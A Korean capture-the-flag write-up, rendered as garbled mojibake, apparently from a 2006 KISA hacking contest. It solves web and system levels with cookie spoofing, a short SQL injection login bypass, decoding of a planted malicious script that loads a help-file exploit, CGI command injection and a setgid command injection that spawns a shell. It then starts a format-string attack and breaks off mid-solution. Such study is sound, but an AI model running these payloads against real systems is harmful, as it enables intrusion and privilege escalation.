+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-
KISA Á¦3ȸ ÇØÅ·/¹æ¾î´ëȸ ¿¹Àü¹®Á¦ Ç®ÀÌ
5Zone Team Report
+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-
¤· ´ëȸÁøÇà : 2006. 5.16(È) ~ 2006. 5.17(¼ö)
¤· ÀÛ ¼º ÀÏ : 2006. 5.17(¼ö)
¤· ÀÛ ¼º ÀÚ : °ºÀ±¸(xCuter)
¤· ÆÀÂü°¡ÀÚ : ÃÖÁø¿í(usapmuzae), ¹Úº´ÀÍ(pbi12), °ºÀ±¸(xCuter)
¤· À¥ Ãë¾àÁ¡ : 1 ~ 4¹ø (4¹®Á¦)
¤· ½Ã½ºÅÛ Ãë¾àÁ¡ : 5 ~ 7¹ø (3¹®Á¦)
1. ¹®Á¦ : Web ÀÎÁõ½Ã ¹ß»ýÇÏ´Â Ãë¾àÁ¡ÀÓ.
Ç®ÀÌ : SQL Injection °ø°ÝÀ» ½ÃµµÇÏ¿´À¸³ª guest °èÁ¤À¸·Î¸¸ ·Î±×ÀÎÀÌ µÊ.
SQL InjectionÃë¾àÁ¡À¸·Î ´õ ´Þ±Å ¸ÔÀ¸¸é µÉ µí ½Í±âµµ ÇÏ¿´À¸³ª http packetÀ» ½º´ÏÇÎÇÑ °á°ú guest·Î ·Î±×ÀÎ µÈ ÈÄ¿£
´ÙÀ½°ú °°ÀÌ ÄíÅ°°ªÀÌ ¼ÂÆÃµÈ °ÍÀ» º¼ ¼ö ÀÖ¾ú´Ù.
" Cookie: User_ID: ·Î±×ÀÎ µÈ ID "
µû¶ó¼ ·Î±×ÀÎ µÈ ID¸¦ admin À¸·Î ¹Ù²Ù´Â ÄíÅ° ½ºÇªÇÎ ±â¹ýÀ» ÅëÇØ ¹®Á¦¸¦ ÇØ°áÇÒ ¼ö ÀÖ¾ú´Ù.
" Cookie: User_ID: admin "
À§¿Í°°ÀÌ ÄíÅ°¸¦ ¼ÂÆÃÇÏ¿© ¼¹ö·Î º¸³»°Ô°Ô µÇ¸é adminÀ¸·Î ·Î±×ÀÎ ÇÑ °Í°ú °°Àº ±ÇÇÑÀ» ȹµæÇÏ°Ô µÈ ¼ÀÀÌ°í »Ñ·ÁÁø Á¤º¸ Áß °ü¸®ÀÚ ºñºô¹øÈ£¸¦ ȹµæ
ºñ¹Ð¹øÈ£ : U can fly
2. ¹®Á¦ : °ü¸®ÀÚ´Â cookie°ªÀ» ÀÌ¿ëÇÑ ÀÎÁõÀÇ Ãë¾àÁ¡¿¡ ÇêÁ¡À» ¹ß°ßÇÏ°í À̸¦ °³¼±ÇÏ¿´´Ù.
±×·¯³ª À¥ ·Î±×ÀÎ ºÎºÐÀÇ Ãë¾àÁ¡Àº °£ÆÄÇÏÁö ¸øÇß´Ù.
À̸¦ ÀÌ¿ë, °ü¸®ÀÚ ÆäÀÌÁö¸¦ Á¶È¸ÇÏ¿© ´ÙÀ½ ´Ü°è·Î ÁøÇàÇϱâ À§ÇÑ Æнº¿öµå¸¦ ȹµæÇ϶ó.
URLÀº http://solve.hdcon.or.kr/Administrator/login.htmlÀÌ´Ù.
Ç®ÀÌ : '¹®ÀÚ(Single Quote Mark)¸¦ ³Ö¾úÀ» ¶§ MySQL ¿¡¼ ¿¡·¯°¡ ¹ß»ýÇÏ¿´´Ù. µû¶ó¼ SQL Injection À̶ó´Â °ÍÀ» Áï½ÃÇÏ°í
°ø°Ý¿¡ µé¾î°¬´Ù. ¼Ò½º È®ÀÎ °á°ú ID, PW¸¦ ÀԷ¹޴ input TAG¿¡¼ maxlength=8·Î ±ÛÀÚ¼ö Á¦ÇÑÀ» µÎ¾ú±â¿¡ À̸¦ ÇØ°áÇϱâ À§ÇØ
¤¡. ³»ÄÄÇ»ÅÍ¿¡¼ ÇØ´ç Æû°ú ¼Ò½º¸¦ ¶È°°ÀÌ ±¸¼ºÇ쵂 form TAGÀÇ actionÀ» ´ëȸ¼¹öÀÇ login.php·Î(·Î±×ÀΠó¸®) ÇÏ°í maxlength
Á¦ÇÑÀ» Ç®¾î¼ °ø°ÝÇÏ´Â ¹æ¹ý
¤¤. ÇÁ¶ô½Ã ÇÁ·Î±×·¥À» ÀÌ¿ëÇÏ¿© ÆÐŶÀ» ¼¹ö·Î Àü¼ÛÇÒ ‹š ID, PW¸¦ Á¶ÀÛ
À§ ¤¡,¤¤ °°Àº ¹æ¹ýÀ» ÅëÇØ ´ÙÀ½°ú °°ÀÌ °ø°ÝÀ» ½Ãµµ ÇÏ¿´´Ù.
°ø°Ý½Ãµµ : 8±ÛÀڷθ¸ ±¸¼ºÇØ¾ß ÇÏÁö¸¸ Æнº¿öµå¸¦ ¿ìȸÇϱâ À§ÇØ or¸¦ ³Ö°ÔµÇ¸é ¹®ÀÚ¿ÀÌ ±æ¾îÁö´Â ¹®Á¦Á¡ÀÌ ÀÖ¾ú°í µû¶ó¼
ÁÖ¼®À» »ç¿ëÇ쵂 MySQLÀ̱⠶§¹®¿¡ '--', '#' ¿Í °°Àº ÁÖ¼®Àº »ç¿ëÇÏÁö ¸øÇϸç '/*'À» »ç¿ëÇÏ¿´´Ù.
Áï 'SQL¹® ÃÖ´ë 6ÀÚ + ÁÖ¼® 2ÀÚ' ÇüÅ¿©¾ß Çß´Ù.
Á¤´ä : '=''/*
È®ÀÎµÈ ¾ÏÈ£ : pw : vkdlxld!!! (ÆÄÀÌÆÃ!!!)
3. ¹®Á¦ : ÃÖ±Ù ¹®Á¦°¡ µÈ Áß±¹ ¹ß ÇØÅ·°ú °ü·ÃÇØ »çÀÌÆ®ÀÇ jsÆÄÀÏÀÌ ÀÚ²Ù º¯Á¶µÇ°í ÀÖ´Â µí ÇÏ´Ù. À̸¦ ºÐ¼®ÇÏ¿© °ø°ÝÀÚ°¡ ³²°Ü³õÀº Á¤º¸¸¦
È®ÀÎÇÏ¿© ´ÙÀ½ ´Ü°è¸¦ À§ÇÑ Æнº¿öµå¸¦ ȹµæÇ϶ó. Àǽɽº·¯¿î ÆÄÀÏÀº http://solve.hdcon.or.kr/modified_js/browser.js ÀÌ´Ù.
Ç®ÀÌ : browser.js ÆÄÀÏ¿¡ º¸¸é ´ÙÀ½ÀÇ Äڵ忡¼ ƯÁ¤ÇÑ htm ÆÄÀÏÀÌ ÀÐÇôÁö°í ÀÖÀ½À» ¾Ë ¼ö ÀÖ´Ù.
document.write('<iframe height=0 width=0 src="http://solve.hdcon.or.kr/chinaatt/kor.htm"></iframe>');
ÀÌ ÆÄÀÏÀ» ¿¾îº¸¸é ´ÙÀ½°ú °°Àº ¼Ò½º¸¦ È®ÀÎÇÒ ¼ö ÀÖ´Ù.
===============================================================================================================================
<script>
<!--
document.write(unescape("%3CSCRIPT%20LANGUAGE%3D%22JavaScript%22%3E%0D%0A%3C%21--%0D
%0Avar%20HtmlStrings%3D%5B%22%3DPCKFDU%21Xjeui%3E1%21Ifjhiu%3E1%21tuzmf%3E%23ejtqmbz
%3Bopof%3C%23%21uzqf%3E%23ufyu0y.tdsj%22%2C%22qumfu%23%21ebub%3E%23nl%3BANTJUTupsf
%3Bniunm%3Bd%3B%5D/niu%01iuuq%3B00329/4/319/294%22%2C%220rrr0ifmq/uyu%3B%3B0%2634%2
63F%2679%2685n%23%02%3E%3D0PCKFDU%02%3E%0E%0B%22%5D%3B%0D%0Afunction%20psw%2
8st%29%7B%0D%0A%20%20var%20varS%3B%0D%0A%20%20varS%3D%22%22%3B%0D%0A%20%20v
ar%20i%3B%0D%0A%20%20for%28var%20a%3D0%3Ba%3Cst.length%3Ba++%29%7B%0D%0A%20%20
%20%20i%20%3D%20st.charCodeAt%28a%29%3B%20%0D%0A%20%20%20%20if%20%28i%3D%3D1%
29%20%0D%0A%20%20%20%20%20%20varS%3DvarS+String.fromCharCode%28%27%22%27.charCode
At%28%29-1%29%3B%0D%0A%20%20%20%20else%20if%20%28i%3D%3D2%29%20%7B%0D%0A%20
%20%20%20%20%20a++%3B%0D%0A%20%20%20%20%20%20varS+%3DString.fromCharCode%28st.ch
arCodeAt%28a%29%29%3B%0D%0A%20%20%20%20%20%20%7D%0D%0A%20%20%20%20else%0D%
0A%20%20%20%20%20%20varS+%3DString.fromCharCode%28i-1%29%3B%0D%0A%20%20%7D%0D%0A
%20%20return%20varS%3B%0D%0A%7D%3B%0D%0Avar%20num%3D3%3B%0D%0Afunction%20S%28%
29%7B%0D%0Afor%28i%3D0%3Bi%3Cnum%3Bi++%29%0D%0A%20%20document.write%28psw%28HtmlS
trings%5Bi%5D%29%29%3B%7D%0D%0AS%28%29%3B%0D%0A//%20--%3E%0D%0A%3C/SCRIPT%3E%0
D%0A%0D%0A"));
//-->
</script>
===============================================================================================================================
ÀÌ ÆÄÀÏÀ» ´Ù½Ã decoding Çϸé..
===============================================================================================================================
<SCRIPT LANGUAGE="JavaScript">
<!--var HtmlStrings=["=PCKFDU!Xjeui>1!Ifjhiu>1!tuzmf>#ejtqmbz;opof<#!uzqf>#ufyu0y.tdsj","qumfu#!ebub>#nl;ANTJUTupsf;niunm;d;]/niu�iuuq;00tpmwf/","lotq/psh0dijobbuu0ifmq/uyu;;0&35&3F&79&85n#�>=0PCKFDU�>�� "];function psw(st){ var varS; varS=""; var i; for(var a=0;a<st.length;a++){ i = st.charCodeAt(a); if (i==1) varS=varS+String.fromCharCode('"'.charCodeAt()-1); else if (i==2) { a++; varS+=String.fromCharCode(st.charCodeAt(a)); } else varS+=String.fromCharCode(i-1); } return varS;};var num=3;function S(){for(i=0;i<num;i++) document.write(psw(HtmlStrings[i]));}S();// --></SCRIPT>
===============================================================================================================================
encoding µÈ ¹®ÀÚ¿ÀÌ º¸ÀÌ´Â ÀÚ¹Ù½ºÅ©¸³Æ® ÆäÀÌÁö ¿´´Ù.
º¸±âÁÁ°Ô ´Ù½Ã Á¤¸®ÇÏÀÚ¸é ´ÙÀ½°ú °°´Ù.
===============================================================================================================================
&
var HtmlStrings=["=PCKFDU!Xjeui>1!Ifjhiu>1!tuzmf>#ejtqmbz;opof<#!uzqf>#ufyu0y.tdsj","qumfu#!ebub>#nl;ANTJUTupsf;niunm;d;]/niu�iuuq;00tpmwf/","lotq/psh0dijobbuu0ifmq/uyu;;0&35&3F&79&85n#>=0PCKFDU>"];
function psw(st)
{
var varS;
varS="";
var i;
for(var a=0;a<st.length;a++)
{
i = st.charCodeAt(a);
if (i==1)
varS=varS+String.fromCharCode('"'.charCodeAt()-1);
else if (i==2)
{
a++;
varS+=String.fromCharCode(st.charCodeAt(a));
}
else
varS+=String.fromCharCode(i-1);
}
return varS;
}
function S()
{
var num=HtmlStrings.length;
for(i=0;i<num;i++)
document.write(psw(HtmlStrings[i]));
}
S();
</SCRIPT>
===============================================================================================================================
HtmlStrings º¯¼öÀÇ ¹®ÀÚ¿À» decoding ÇÏ¸é ´ÙÀ½°ú °°Àº ¹®ÀÚ¿ÀÌ µÈ´Ù.
<OBJECT Width=0 Height=0 style="display:none;" type="text/x-scriptlet" data="mk:@MSITStore:mhtml:c:\.mht!http://solve.knsp.org/chinaatt/help.txt::/%24%2E%68%74m"></OBJECT>
±×·¯³ª solve.knsp.org URLÀº Á×¾îÀÖ¾ú°í, µû¶ó¼ solve.hdcon.or.kr ·Î URLÀ» ¹Ù²Ù¾îº¸´Ï ITFS Æ÷¸ËÀÇ help ÆÄÀÏ·Î º¸ÀÌ´Â Äڵ尡 º¸¿´´Ù.
ÀÌ Äڵ带 help.chm À¸·Î ÀúÀåÇÏ¿© ÀÐÀ¸´Ï Online Help ÇÁ·Î±×·¥ÀÌ ÀÛµ¿ µÇ°í 'Á¦3ȸÇØÅ·¹æ¾î´ëȸ $.htm'À̶ó´Â ¸ñÂ÷¸¸ ´Þ¶ûÇϳª º¸¿´´Ù.
ÀÌ ¶§ ÇÁ·Î¼¼½º¸¦ È®Àΰá°ú sending.exe °¡ ½ÇÇàµÊÀÌ È®ÀεǾú°í sending.exe¸¦ ÀÚ¼¼È÷ ºÐ¼®Çϱâ Àü¿¡ ½ÇÇàÆÄÀÏ¿¡ Æ÷ÇÔµÈ text¹®ÀÚ¿À»
Á¶»çÇØ º¸´Ï ´ÙÀ½°ú °°Àº ¹®ÀÚ¿ÀÌ Á¸ÀçÇÏ¿´´Ù.
nslookup level4_password_is_ch!neseh4cker www.knsp.org
nslookupÀ» ½ÇÇàÇϸç query ·Î level4ÀÇ password°¡ º¸¿´´Ù.
Á¤´ä : ch!neseh4cker
4. ¹®Á¦ : ´Ù¿î·Îµå ÆäÀÌÁö°¡ Àִµ¥ ÀÌ ÆäÀÌÁöÀÇ Ãë¾àÁ¡À» ÀÌ¿ëÇØ ½Ã½ºÅÛ ÀÚ¿ø¿¡ Á¢±ÙÇÒ ¼ö ÀÖ´Â Ãë¾àÁ¡ÀÌ Á¸ÀçÇÑ´Ù.
Ç®ÀÌ : ´Ù¿î¹Þ´Â HTML ÆäÀÌÁö¸¦ º¸´Ï /cgi-bin/download.cgi?f_name=A_Project.ppt ÀÌ·±½ÄÀ¸·Î ´Ù¿îÀ» ¹Þ´Â´Ù. ´Ù¿î·Îµå Ãë¾àÁ¡ Àΰ¡º¸´Ù Çؼ
A_Project.ppt ÆÄÀϸíÀ» ¹Ù²ã¼ ½Ã½ºÅÛ ÆÄÀÏÀ» ´Ù¿î·Îµå ÇÏ·Á°í ÇÏ¿´À¸³ª Cookie üũ¸¦ ÇÏ´ÂÁö °ü¸®ÀÚ¸¸ ´Ù¿î·Îµå °¡´ÉÇÏ´Ù´Â ¸Þ½ÃÁö¸¸ ³ª¿Ô´Ù
ÄíÅ°°ª ÃßÃøµµ ÇØ ºÃÀ¸³ª ¹º°¡ ´Ù¸¥°Å¶ó »ý°¢ÇÏ°í f_name º¯¼ö°¡ ½É»óÄ¡ ¾Ê¾Æ Ȥ½Ã ¸í·É½ÇÇàÀÌ ¾Æ´Ñ°¡ Çؼ ÀǽÉÇß°í, ±×°ÍÀÌ ÀûÁßÇßÀ½.
GET /cgi-bin/download.cgi?f_name=AAAA|ls| HTTP/1.0
-> cgi-lib1.pl
data
download.cgi
GET /cgi-bin/download.cgi?f_name=AAAA|ls%20-al%20data| HTTP/1.0
-> .............. ._READ_ME.TXT
GET /cgi-bin/download.cgi?f_name=AAAA|cat%20data/._READ_ME.TXT| HTTP/1.0
-> http://solve.hdcon.or.kr/cgi-bin/data/._READ_ME.TXT
HTTP/1.1 200 OK
Date: Tue, 16 May 2006 04:28:01 GMT
Server: Apache/1.3.35 (Unix) PHP/5.1.4
Connection: close
Content-Type: application/x-cgklyk
ÃàÇÏÇÕ´Ï´Ù. À¥ °ü·Ã ¹®Á¦¸¦ ¸ðµÎ Åë°úÇϼ̽À´Ï´Ù.
ÀÌÈÄÀÇ ¹®Á¦´Â SSHŬ¸®À̾ðÆ® ÇÁ·Î±×·¥À» ÀÌ¿ëÇÏ¿© ·Î±×ÀÎÀ» ÇϽŠÈÄ ÁøÇàÇϽñ⠹ٶø´Ï´Ù.
Á¢¼ÓID¿Í Æнº¿öµå´Â ¹®Á¦È®ÀÎ ÆäÀÌÁö¿¡¼ È®ÀÎÇÏ½Ç ¼ö ÀÖ½À´Ï´Ù.
±×·³ ¼ö°íÇϽʽÿÀ.
À̹ø ´Ü°èÀÇ Æнº¿öµå´Â "Are you ready?"ÀÔ´Ï´Ù.
5. ¹®Á¦ : ½Ã½ºÅÛ °ü¸®ÀÚ°¡ ¼¹ö¸¦ üũÇϱâ À§ÇØ °£´ÜÇÑ ÇÁ·Î±×·¥À» ¸¸µé¾ú´Âµ¥ /sbin/pingÀ» Àý´ë°æ·Î¸¦ »ç¿ëÇÏ¿© ½ÇÇàÇϵµ·Ï ÇÏ¿´´Ù.
ÇÏÁö¸¸ ¾î¶²ÀÌ°¡ Ãë¾àÁ¡À¸·Î °ü¸®ÀÚ¸¦ °ï¶õÇÏ°Ô ¸¸µé¾ú´Ù. À̸¦ ÀÌ¿ëÇÏ¿© ´ÙÀ½ ´Ü°è¸¦ À§ÇÑ Æнº¿öµå¸¦ ȹµæÇ϶ó.
¾Æ·¡ÀÇ °èÁ¤Àº 5~7¹ø ¹®Á¦¸¦ Ç®±â À§ÇØ solve.hdcon.or.kr¿¡ Á¢¼ÓÇϱâ À§ÇÑ ¾ÆÀ̵ð ¹× Æнº¿öµåÀÌ´Ù.
ÇØ´ç ½Ã½ºÅÛ¿¡´Â ssh(Æ÷Æ® 8000)À¸·Î Á¢¼ÓÇÑ´Ù.
ID : user02
PW : 8102746045
Ç®ÀÌ : ¤· ½Ã½ºÅÛ Á¤º¸
FreeBSD solve.hdcon.or.kr 5.4-RELEASE FreeBSD 5.4-RELEASE #0: Sun May 8 10:21:06 UTC 2005 root@harlow.cse.buffalo.edu:/usr/obj/usr/src/sys/GENERIC i386
¤· °Ë»ö
level5 °èÁ¤À» ȹµæÇϱâ À§ÇÑ setuid, setgid Áß level5°¡ owner or group ÀÎ °èÁ¤À» È®ÀÎÇß´Ù.
$ find / -group level5 -exec ls -al {} \; 2>/dev/null
-rwxr-sr-x 1 root level5 5135 May 11 03:13 /usr/local/sbin/pong
¤· ºÐ¼®
Dump of assembler code for function main:
0x0804858c <main+0>: push %ebp '
0x0804858d <main+1>: mov %esp,%ebp '
0x0804858f <main+3>: sub $0xd8,%esp ' esp¸¦ 216byte ¸¸Å °¨¼Ò½ÃÄÑ °ø°£È®º¸
0x08048595 <main+9>: and $0xfffffff0,%esp '
0x08048598 <main+12>: mov $0x0,%eax '
0x0804859d <main+17>: add $0xf,%eax '
0x080485a0 <main+20>: add $0xf,%eax '
0x080485a3 <main+23>: shr $0x4,%eax '
0x080485a6 <main+26>: shl $0x4,%eax '
0x080485a9 <main+29>: sub %eax,%esp '
0x080485ab <main+31>: cmpl $0x1,0x8(%ebp) ' if ebp+8(argc)==1
0x080485af <main+35>: jle 0x80485e4 <main+88> ' jmp main+88
0x080485b1 <main+37>: sub $0x4,%esp '
0x080485b4 <main+40>: mov 0xc(%ebp),%eax ' argv[0] -> %eax
0x080485b7 <main+43>: add $0x4,%eax ' argv[1] -> %eax
0x080485ba <main+46>: pushl (%eax) ' argv[1] push
0x080485bc <main+48>: push $0x804867c ' "/sbin/ping %s" push
0x080485c1 <main+53>: lea 0xffffff28(%ebp),%eax ' &ebp-216 -> %eax
0x080485c7 <main+59>: push %eax ' buf[216] push
0x080485c8 <main+60>: call 0x804842c ' call sprintf()
0x080485cd <main+65>: add $0x10,%esp '
0x080485d0 <main+68>: sub $0xc,%esp '
0x080485d3 <main+71>: lea 0xffffff28(%ebp),%eax ' &ebp-216 -> %eax
0x080485d9 <main+77>: push %eax ' buf[216] push
0x080485da <main+78>: call 0x804840c ' call system() <- Ãë¾àÁ¡ ¹ß»ý
0x080485df <main+83>: add $0x10,%esp '
0x080485e2 <main+86>: jmp 0x80485f9 <main+109> '
0x080485e4 <main+88>: sub $0x8,%esp '
0x080485e7 <main+91>: mov 0xc(%ebp),%eax ' ebp+c(argv[0]) -> %eax
0x080485ea <main+94>: pushl (%eax) ' argv[0] push
0x080485ec <main+96>: push $0x804868c ' "usage : %s HOST_NAME(or HOST_IP)\n" push
0x080485f1 <main+101>: call 0x80483fc ' call printf()
0x080485f6 <main+106>: add $0x10,%esp '
0x080485f9 <main+109>: leave '
0x080485fa <main+110>: ret '
0x080485fb <main+111>: nop '
------------------------- ¼Ò½º·Î º¯È¯ -------------------------
main(int argc, char *argv[])
{
char buf[216];
if(argc==1)
printf("usage : %s HOST_NAME(or HOST_IP)\n", argv[0]);
else
{
sprintf(buf, "/sbin/ping %s", argv[1]);
system(buf);
}
}
---------------------------------------------------------------
ÀÌ pong À̶ó´Â ÇÁ·Î±×·¥Àº 2°¡Áö Ãë¾àÁ¡ÀÌ Á¸ÀçÇÑ´Ù.
ù¹ø°´Â Buffer Overflow Ãë¾àÁ¡ÀÌ°í,
µÎ¹ø°´Â ÀýÀýÄ¡ ¸øÇÑ system() ÇÔ¼öÀÇ »ç¿ëÀÌ´Ù.
¿ì¸®ÆÀÀº ´ëȸ ÁøÇà»ó ½Ã°£ÀÌ Áß¿äÇϱ⠶§¹®¿¡ Á»´õ ½±°Ô ÇØ°á°¡´ÉÇÑ µÎ¹ø° ¹æ¹ýÀ» ÅÃÇß´Ù.
system() ÇÔ¼ö µî ½Ã½ºÅÛ ¸í·ÉÀ» ½ÇÇàÇÒ ¼ö ÀÖ´Â ÇÔ¼ö´Â »ç¿ë½Ã °¢º°ÇÑ ÁÖÀÇ°¡ ¿ä±¸µÈ´Ù. °ø°ÝÀÚ°¡ ¿øÇÏ´Â ¸í·ÉÀ» ½ÇÇàÇÒ ¼ö ÀÖ´Â
°æ¿ì°¡ ¸¹±â ¶§¹®Àε¥ ÀÌ ¹®Á¦ÀÇ °æ¿ì ¾Æ±Ô¸ÕÆ®·Î Á÷Á¢ ¿øÇÏ´Â °ªÀ» ÀÔ·ÂÇÒ ¼ö ÀÖ¾ú±â ¶§¹®¿¡ ¹®Á¦°¡ µÈ´Ù.
system("/sbin/ping localhost;id") <- »ç¿ëÀÚ°¡ ´ÙÀ½°ú °°ÀÌ ÇüÅ·ΠÀÔ·ÂÀ» ÃëÇßÀ» °æ¿ì setgid bit°¡ °É¸° ÀÌ pong À̶ó´Â
ÇÁ·Î±×·¥ÀÌ ÇØ´ç gid±ÇÇÑÀ¸·Î id¸í·É±îÁö ½ÇÇàÇÏ°Ô µÈ´Ù. µû¶ó¼ ';', '&&', '`', '|' ¿Í °°Àº ¹®ÀÚ¸¦ ÀÌ¿ëÇØ ½©À» ½ÇÇàÇÏ´Â ¹æ¹ýÀ¸·Î exploit ÇÔ
¤· Exploit
whoami ´Â /sbin/ping ÇÁ·Î±×·¥ÀÇ ¸Å°³º¯¼ö·Î »ç¿ëµÇ¸ç, ';'¿¡ ÀÇÇØ ping ¼öÇà ÈÄ sh¸¦ ½ÇÇàÇÏ°Ô µÇ¹Ç·Î ½© ¶³¾îÁö°Ô µÇ´Â ¹æ¹ý ÀÌ¿ë
$ /usr/local/sbin/pong "whoami;sh"
ping: cannot resolve whoami: No address associated with name
$ id
uid=1003(user02) gid=1003(user02) egid=500(level5) groups=500(level5), 1003(user02)
$ cat /etc/passwd|grep level5
level5:*:500:500:User &:/export/home/level5:/sbin/nologin
$ cd /export/home/level5
$ ls
LEVEL5_ANSWER
$ cat *
Congratulations!!
Level5's password : table_tennis
6. ¹®Á¦ : »ç¿ëÀÚµéÀ» À§ÇÑ ¸Þ¼¼Áö¸¦ ³²±â´Â ÇÁ·Î±×·¥ÀÌ ÀÖ´Ù.
±×·¯³ª ÀÌ ÇÁ·Î±×·¥¿¡´Â ¾î¶² Ãë¾àÁ¡ÀÌ Á¸ÀçÇϴµ¥ À̸¦ ÀÌ¿ëÇÏ¿© ´ÙÀ½ ·¹º§ÀÇ ±ÇÇÑÀ» ȹµæÇϽÿÀ.
Ç®ÀÌ : ¤· °Ë»ö
$ find / -group level6 -exec ls -al {} \; 2>/dev/null
-rwxr-sr-x 1 root level6 5546 May 16 09:58 /usr/local/bin/savemsg
¤· ºÐ¼®
BOF ½ÃµµÇÏ¿´À¸³ª ÀûÀýÇÑ Ã¼Å©°¡ ÀÌ·ç¾îÁ® ½ÇÆÐÇÏ¿´°í %x¸¦ ³Ö¾îº¸´Ï ½ºÅÃÀÇ Æ¯Á¤ÇÑ °ªÀ» Ãâ·ÂÇÏ¿© Format String Bug È®ÀÎ
Dump of assembler code for function main:
0x0804864c <main+0>: push %ebp
0x0804864d <main+1>: mov %esp,%ebp
0x0804864f <main+3>: sub $0x48,%esp
0x08048652 <main+6>: and $0xfffffff0,%esp
0x08048655 <main+9>: mov $0x0,%eax
0x0804865a <main+14>: add $0xf,%eax
0x0804865d <main+17>: add $0xf,%eax
0x08048660 <main+20>: shr $0x4,%eax
0x08048663 <main+23>: shl $0x4,%eax
0x08048666 <main+26>: sub %eax,%esp
0x08048668 <main+28>: sub $0x4,%esp
0x0804866b <main+31>: push $0x34 ' 0x34(52) push
0x0804866d <main+33>: push $0x0 ' 0x0 (0) push
0x0804866f <main+35>: lea 0xffffffb8(%ebp),%eax ' ebp-72 -> %eax
0x08048672 <main+38>: push %eax ' ebp-72=buf[52] push
0x08048673 <main+39>: call 0x8048454 ' memset(buf, 0, 52);
0x08048678 <main+44>: add $0x10,%esp
0x0804867b <main+47>: sub $0xc,%esp
0x0804867e <main+50>: push $0x80487a3 ' "\nLevel 6\n\n"
0x08048683 <main+55>: call 0x8048434 ' call printf()
0x08048688 <main+60>: add $0x10,%esp
0x0804868b <main+63>: sub $0xc,%esp
0x0804868e <main+66>: push $0x80487ae ' "¸Þ¼¼Áö¸¦ ³²±â¼¼¿ä.\n"
0x08048693 <main+71>: call 0x8048434 ' call printf()
0x08048698 <main+76>: add $0x10,%esp
0x0804869b <main+79>: sub $0x4,%esp
0x0804869e <main+82>: push $0x32 ' 0x32(50) push
0x080486a0 <main+84>: lea 0xffffffb8(%ebp),%eax ' ebp-72 -> %eax
0x080486a3 <main+87>: push %eax ' buf[52] push
0x080486a4 <main+88>: push $0x0 ' 0x0 (0) push
0x080486a6 <main+90>: call 0x8048444 ' call read(0, buf, 50);
0x080486ab <main+95>: add $0x10,%esp
0x080486ae <main+98>: sub $0xc,%esp
0x080486b1 <main+101>: push $0x80487c4 ' "´ÙÀ½ÀÇ ¸Þ¼¼Áö¸¦ ³²±â¼Ì½À´Ï´Ù.\n"
0x080486b6 <main+106>: call 0x8048434 ' call printf()
0x080486bb <main+111>: add $0x10,%esp
0x080486be <main+114>: sub $0xc,%esp
0x080486c1 <main+117>: lea 0xffffffb8(%ebp),%eax ' ebp-72 -> %eax
0x080486c4 <main+120>: push %eax ' buf[52] push
0x080486c5 <main+121>: call 0x80485c4 <print_msg> ' call print_msg(buf);
0x080486ca <main+126>: add $0x10,%esp
0x080486cd <main+129>: sub $0xc,%esp
0x080486d0 <main+132>: push $0x80487e3 ' "\nÀÌ¿ëÇØÁּż °¨»çÇÕ´Ï´Ù.\n\n"
0x080486d5 <main+137>: call 0x8048434 ' call printf();
0x080486da <main+142>: add $0x10,%esp
0x080486dd <main+145>: leave
0x080486de <main+146>: ret
0x080486df <main+147>: nop
Dump of assembler code for function print_msg:
0x080485c4 <print_msg+0>: push %ebp
0x080485c5 <print_msg+1>: mov %esp,%ebp
0x080485c7 <print_msg+3>: sub $0x88,%esp
0x080485cd <print_msg+9>: movl $0x1,0xfffffff4(%ebp) ' ebp-12 buf1[4]=1, dum[4], dum[4], ebp
0x080485d4 <print_msg+16>: movl $0x2,0xffffffa4(%ebp) ' ebp-92 buf2[4]=2
0x080485db <print_msg+23>: movl $0x3,0xffffffa0(%ebp) ' ebp-96 buf3[4]=3
0x080485e2 <print_msg+30>: movl $0x4,0xffffff9c(%ebp) ' ebp-104 buf4[4]=4
0x080485e9 <print_msg+37>: movl $0x5,0xffffff98(%ebp) ' ebp-108 buf5[4]=5
0x080485f0 <print_msg+44>: movl $0x6,0xffffff94(%ebp) ' ebp-112 buf6[4]=6
0x080485f7 <print_msg+51>: movl $0x7,0xffffff90(%ebp) ' ebp-116 buf7[4]=7
0x080485fe <print_msg+58>: movl $0x8,0xffffff8c(%ebp) ' ebp-120 buf8[4]=8
0x08048605 <print_msg+65>: movl $0x9,0xffffff88(%ebp) ' ebp-124 buf9[4]=9
0x0804860c <print_msg+72>: movl $0xa,0xffffff84(%ebp) ' ebDp-126 buf10[4]=10
0x08048613 <print_msg+79>: sub $0x4,%esp
0x08048616 <print_msg+82>: push $0x34 ' 0x34(52) push
0x08048618 <print_msg+84>: push $0x0 ' 0x0 (0) push
0x0804861a <print_msg+86>: lea 0xffffffa8(%ebp),%eax ' ebp-88 -> %eax
0x0804861d <print_msg+89>: push %eax ' buf[52] push
0x0804861e <print_msg+90>: call 0x8048454 ' call memset(buf[52], 0, 52);
0x08048623 <print_msg+95>: add $0x10,%esp
0x08048626 <print_msg+98>: sub $0x8,%esp
0x08048629 <print_msg+101>: pushl 0x8(%ebp) ' argc push
0x0804862c <print_msg+104>: lea 0xffffffa8(%ebp),%eax ' ebp-88 -> %eax
0x0804862f <print_msg+107>: push %eax ' buf[52] push
0x08048630 <print_msg+108>: call 0x8048424 ' strcpy(buf, 0);
0x08048635 <print_msg+113>: add $0x10,%esp
0x08048638 <print_msg+116>: sub $0xc,%esp
0x0804863b <print_msg+119>: lea 0xffffffa8(%ebp),%eax ' ebp-88 -> %ax
0x0804863e <print_msg+122>: push %eax ' buf[52] push
0x0804863f <print_msg+123>: call 0x8048434 ' call printf(buf) <- Ãë¾àÁ¡ ¹ß»ý
0x08048644 <print_msg+128>: add $0x10,%esp
0x08048647 <print_msg+131>: leave
0x08048648 <print_msg+132>: ret
0x08048649 <print_msg+133>: lea 0x0(%esi),%esi
¤· Exploit
- ÀÔ·ÂÇÑ °ªÀÌ ÀúÀåµÇ´Â ¹öÆÛ¿Í Ãâ·ÂµÉ ¶§ÀÇ %esp ¿ÍÀÇ °Å¸® È®ÀÎ
16¹øÀÇ pop °úÁ¤ ³¡¿¡ ÀÔ·ÂÇÑ °ªÀÌ Ãâ·ÂµÊÀ» È®ÀÎ
================================================================================================================
$ ./f
Level 6
¸Þ¼¼Áö¸¦ ³²±â¼¼¿ä.
AAAA%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x
´ÙÀ½ÀÇ ¸Þ¼¼Áö¸¦ ³²±â¼Ì½À´Ï´Ù.
AAAAbfbfec58341bfbfeb6000a9876543241414141
ÀÌ¿ëÇØÁּż °¨»çÇÕ´Ï´Ù.
$
================================================================================================================
